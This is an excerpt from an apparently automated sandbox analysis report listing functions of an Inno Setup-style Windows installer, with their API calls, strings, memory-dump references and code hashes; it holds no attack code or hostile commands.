                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406288 Relevance: 4.5, APIs: 3, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GlobalHandle.KERNEL32 ref: 00406289
                                                                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 00406290
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406295
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$FreeHandleWire
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 318822183-0
                                                                                                                            • Opcode ID: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                            • Instruction ID: 0bd3332245bc481727117fba3a6c85ee4c387b864c86d5f24a339be909c9c9d3
                                                                                                                            • Opcode Fuzzy Hash: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                            • Instruction Fuzzy Hash: 4FA001C4800A01A9DC0432B2080B93B200CD84122C390096B3408BA182887C88401A3D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00469F1C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveWindow
                                                                                                                            • String ID: PrepareToInstall
                                                                                                                            • API String ID: 2558294473-1101760603
                                                                                                                            • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                            • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                                            • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                            • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C4BC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: /:*?"<>|
                                                                                                                            • API String ID: 0-4078764451
                                                                                                                            • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                            • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                                            • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                            • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004825C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveWindow
                                                                                                                            • String ID: InitializeWizard
                                                                                                                            • API String ID: 2558294473-2356795471
                                                                                                                            • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                            • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                                            • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                            • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047C4F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                                            • API String ID: 47109696-1019749484
                                                                                                                            • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                            • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                                                            • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                            • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046EE44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                            Strings
                                                                                                                            • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: Inno Setup: Setup Version
                                                                                                                            • API String ID: 3702945584-4166306022
                                                                                                                            • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                            • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                                            • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                            • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046EEB4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: NoModify
                                                                                                                            • API String ID: 3702945584-1699962838
                                                                                                                            • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                            • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                                            • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                            • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E474 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                                              • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                                              • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                                              • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                                            • SendNotifyMessageA.USER32(0004043A,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2649214853-0
                                                                                                                            • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                            • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                                            • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                            • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047DD98 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 157COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                                              • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMetricsMultiSystemWide
                                                                                                                            • String ID: /G
                                                                                                                            • API String ID: 224039744-2088674125
                                                                                                                            • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                            • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                                            • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                            • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042DEC0 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                                            • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2818636725-0
                                                                                                                            • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                            • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                                            • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                            • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004527E8 Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2919029540-0
                                                                                                                            • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                            • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                                            • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                            • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040ADD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4097029671-0
                                                                                                                            • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                            • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                                            • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                            • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041EEA4 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                            • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CurrentEnumWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2396873506-0
                                                                                                                            • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                            • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                                            • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                            • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452C80 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastMove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 55378915-0
                                                                                                                            • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                            • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                                            • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                            • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452770 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
